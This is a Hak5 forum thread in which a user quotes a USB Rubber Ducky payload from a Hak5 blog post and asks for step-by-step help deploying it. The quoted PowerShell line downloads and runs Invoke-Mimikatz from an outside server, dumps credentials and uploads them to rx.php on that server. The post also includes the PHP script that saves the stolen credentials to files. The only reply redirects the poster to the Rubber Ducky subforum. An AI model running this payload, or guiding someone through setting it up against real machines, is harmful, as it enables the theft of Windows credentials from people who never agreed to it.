Garfield025 Posted February 14, 2018 Share Posted February 14, 2018 Hi, I've been trying to set up the script for some time, which is the following: https://www.hak5.org/blog/15-second-password-hack-mr-robot-style, in the first part it says the following: REM Download and execute Invoke Mimikatz then upload the results STRING powershell "IEX (New-Object Net.WebClient).DownloadString('http://darren.kitchen/im.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('http://darren.kitchen/rx.php', $output)" ENTER DELAY 15000 Where can I upload the files and how? The rx.php where it is put, on the server? <?php $file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds"; file_put_contents($file, file_get_contents("php://input")); ?> How do I execute it? I would very much appreciate someone helping me step by step to do it. Quote Link to comment Share on other sites More sharing options...
Rkiver Posted February 14, 2018 Share Posted February 14, 2018 Hi there, welcome to the forums. All of Hak5s products have their own dedicated sections of the forums, and they are the best place to start with information and guides. You asked about: USB Rubber Ducky, so check out https://forums.hak5.org/forum/56-usb-rubber-ducky/ Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.